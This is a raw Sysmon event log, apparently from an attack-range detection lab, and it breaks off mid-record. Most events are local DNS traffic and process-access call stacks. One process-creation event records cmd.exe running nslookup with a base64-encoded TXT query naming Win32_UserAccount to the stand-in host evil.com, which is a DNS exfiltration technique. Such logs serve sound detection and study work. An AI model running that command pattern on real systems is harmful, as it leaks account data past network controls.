14:21:45.398{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgjloc.tmpMD5=A34E51212F39558EBE732D21D99FEDF2,SHA256=5DE051C45C6FF241BEB3458EC270E41740C34AAC9505902985C1C0DEA13E8B9D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.899{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51121- 354300x8000000000000000213636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.899{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-51121-false127.0.0.1-53domain 354300x8000000000000000213635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.899{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-51120-false127.0.0.1-53domain 354300x8000000000000000213634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.899{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51120- 354300x8000000000000000213633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.899{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-51120-false127.0.0.1-53domain 354300x8000000000000000213632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.898{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-51119-false127.0.0.1-53domain 354300x8000000000000000213631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.898{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51119- 354300x8000000000000000213630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.898{00000000-0000-0000-0000-000000000000}7388<unknown process>-udptruefalse127.0.0.1-51119-false127.0.0.1-53domain 354300x8000000000000000213629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.828{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51118-false127.0.0.1-53domain 354300x8000000000000000213628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.828{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51118- 354300x8000000000000000213627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.828{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51118-false127.0.0.1-53domain 354300x8000000000000000213626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.828{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51117-false127.0.0.1-53domain 354300x8000000000000000213625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.828{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51117- 354300x8000000000000000213624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.828{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51117-false127.0.0.1-53domain 354300x8000000000000000213623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.827{00000000-0000-0000-0000-000000000000}1368<unknown process>-udpfalsefalse127.0.0.1-51116-false127.0.0.1-53domain 354300x8000000000000000213622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.827{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51116- 354300x8000000000000000213621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.827{00000000-0000-0000-0000-000000000000}1368<unknown process>-udptruefalse127.0.0.1-51116-false127.0.0.1-53domain 354300x8000000000000000213620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.765{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51115- 354300x8000000000000000213619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.765{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51114- 354300x8000000000000000213618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.765{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51113- 354300x8000000000000000213617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.701{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51112- 354300x8000000000000000213616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.701{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51111- 354300x8000000000000000213615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.701{00000000-0000-0000-0000-000000000000}8104<unknown process>-udptruefalse127.0.0.1-51111-false127.0.0.1-53domain 354300x8000000000000000213614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.701{00000000-0000-0000-0000-000000000000}8104<unknown process>-udpfalsefalse127.0.0.1-51110-false127.0.0.1-53domain 354300x8000000000000000213613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.701{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51110- 354300x8000000000000000213612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.621{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-51109-false127.0.0.1-53domain 354300x8000000000000000213611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.621{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51109- 354300x8000000000000000213610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.620{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51108- 354300x8000000000000000213609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.620{00000000-0000-0000-0000-000000000000}3864<unknown process>-udptruefalse127.0.0.1-51108-false127.0.0.1-53domain 354300x8000000000000000213608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.620{00000000-0000-0000-0000-000000000000}3864<unknown process>-udpfalsefalse127.0.0.1-51107-false127.0.0.1-53domain 354300x8000000000000000213607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.619{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51107- 354300x8000000000000000213606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.522{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51106- 354300x8000000000000000213605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.522{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51105- 354300x8000000000000000213604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.522{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51104- 354300x8000000000000000213603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.424{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51103- 354300x8000000000000000213602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.424{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51102- 354300x8000000000000000213601Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.423{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51101- 354300x8000000000000000213600Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.325{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51100- 354300x8000000000000000213599Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.325{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51099- 354300x8000000000000000213598Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.324{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51098- 354300x8000000000000000213597Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.059{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-51091-false127.0.0.1-53domain 354300x8000000000000000213596Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.059{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-51091-false127.0.0.1-53domain 354300x8000000000000000213595Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.059{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-51090-false127.0.0.1-53domain 354300x8000000000000000213594Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.059{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-51090-false127.0.0.1-53domain 354300x8000000000000000213593Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.058{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-51089-false127.0.0.1-53domain 354300x8000000000000000213592Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:43.058{00000000-0000-0000-0000-000000000000}6512<unknown process>-udptruefalse127.0.0.1-51089-false127.0.0.1-53domain 354300x8000000000000000213591Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.994{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-51088-false127.0.0.1-53domain 354300x8000000000000000213590Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.994{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-51088-false127.0.0.1-53domain 354300x8000000000000000213589Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.994{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-51087-false127.0.0.1-53domain 354300x8000000000000000213588Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.994{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-51087-false127.0.0.1-53domain 354300x8000000000000000213587Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.994{00000000-0000-0000-0000-000000000000}1188<unknown process>-udpfalsefalse127.0.0.1-51086-false127.0.0.1-53domain 354300x8000000000000000213586Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:42.993{00000000-0000-0000-0000-000000000000}1188<unknown process>-udptruefalse127.0.0.1-51086-false127.0.0.1-53domain 10341000x8000000000000000213585Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.361{2E1864BB-18F9-629A-8945-000000005F02}436408C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8A45-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213584Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.345{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213583Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.345{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213582Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.345{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8A45-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213581Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.345{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213580Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.345{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213579Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.345{2E1864BB-18F9-629A-8845-000000005F02}26085604C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-8A45-000000005F02}6984C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213578Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.359{2E1864BB-18F9-629A-8A45-000000005F02}6984C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-8845-000000005F02}2608C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgjloc.tmp 2>&1 10341000x8000000000000000213577Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.330{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8945-000000005F02}436C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213576Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.330{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8945-000000005F02}436C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213575Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.330{2E1864BB-18F9-629A-8945-000000005F02}436408C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8845-000000005F02}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213574Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.314{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8945-000000005F02}436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213573Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.298{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8845-000000005F02}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213572Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.298{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213571Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.298{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213570Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.298{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd